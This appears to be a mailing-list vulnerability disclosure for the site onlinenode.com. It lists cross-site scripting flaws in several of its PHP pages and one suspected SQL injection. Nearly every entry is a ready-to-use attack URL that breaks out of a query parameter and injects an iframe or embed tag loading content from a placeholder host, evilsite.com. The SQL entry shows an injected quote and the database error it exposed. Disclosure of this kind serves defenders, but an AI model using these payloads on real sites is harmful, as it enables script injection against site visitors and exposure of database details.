<<< Date Index >>>     <<< Thread Index >>>

Onlinenode.com - XSS



Onlinenode.com

Homepage:
http://www.onlinenode.com

Effected files:
node_category.php
node_article.php
webpage.php
guestbook.php
journal.php
pictures.php
chatroom.php

---------------------------

XSS Vuln via node_category.php:

One way to archive this is to use black tags with an open ended iframe tag:
http://www.onlinenode.com/node_category.php?forms_action=node_category&forms_id_category=1";>'>"<iframe%20src=http://evilsite.com/scriptlet.html%20<

Another way would be to use <embed> tags, since using flash could also create a 
XSS attack:

http://www.onlinenode.com/node_category.php?forms_action=node_category&forms_id_category=1''"<"'><EMBED%20src=http://www.evilsite.com/badflash.swf></embed><'<"">

--------------------------------------------

XSS Vuln via node_article.php:

One way to archive this is to use black tags with an open ended iframe tag:

http://www.onlinenode.com/node_article.php?forms_action=node_article&forms_id_article=158391149699301''"<"'><iframe%20src=http://evilsite.com/scriptlet.html%20<


Another way would be to use <embed> tags, since using flash could also create a 
XSS attack:

http://www.onlinenode.com/node_article.php?forms_action=node_article&forms_id_article=158391149699301''"<"'><EMBED%20src=http://www.evilsite.com/badflash.swf></embed><'<"">

-------------------------------------------

Possible SQL injection due to with query error:

http://www.onlinenode.com/webpage.php?forms_action=webpage&forms_id_user=19'

You have an error in your SQL syntax. Check the manual that corresponds to your 
MySQL server version for the right syntax to use 

near '127.0.0.1' AND host != 'adsl-127-0-0.lol.somehost.com'' >>> UPDATE 
counter SET ip = '127.0.0.1',host = 'adsl-127-0-0.lol.

somehost.com',count = count + 1 WHERE id_user = '19'' AND ip != '127.0.0.1' AND 
host != 'dsl-127-0-0.lol.somehost.com'

We can see from the above query, a few table names as well as our IP + hostmask.


XSS Vuln in webpage.php:

http://www.onlinenode.com/webpage.php?forms_action=webpage&forms_id_user=2";>'><iframe%20src=http://evilsite.com/scriptlet.html
 <

Again, same as above the <embed> tags also work for flash.
------------------------------------------

XSS Vulnerability via guestbook.php:

http://www.onlinenode.com/guestbook.php?forms_action=guestbook1&forms_id_user=18";>'><iframe%20src=http://evilsite.com/scriptlet.html%20<

Again, same as above the <embed> tags also work for flash.

-----------------------------------------

XSS Vulnerability via journal.php:
http://www.onlinenode.com/journal.php?forms_action=journal&forms_id_user=";>'><iframe%20src=http://evilsite.com/scriptlet.html%20<

Again, same as above the <embed> tags also work for flash.

---------------------------------------
XSS Vuln via pictures.php:

http://www.onlinenode.com/pictures.php?forms_action=pictures&forms_id_user=";>'><iframe%20src=http://evilsite.com/scriptlet.html%20<

Again, same as above the <embed> tags also work for flash.

----------------------------------------

XSS Vuln via mb_thread.php when viewing threads:

http://www.onlinenode.com/mb_thread.php?forms_action=mb_thread1&forms_id_thread=0";>'><iframe%20src=http://evilsite.com/scriptlet.html%20<

Again, same as above the <embed> tags also work for flash.

-------------------------------------
XSS Vuln via chatroom.php:

http://www.onlinenode.com/chatroom.php?forms_action=chatroom_main&forms_room=";>'><iframe%20src=http://evilsite.com/scriptlet.html%20<&button.x=24&button.y=14

Again, <embed> tags work here too.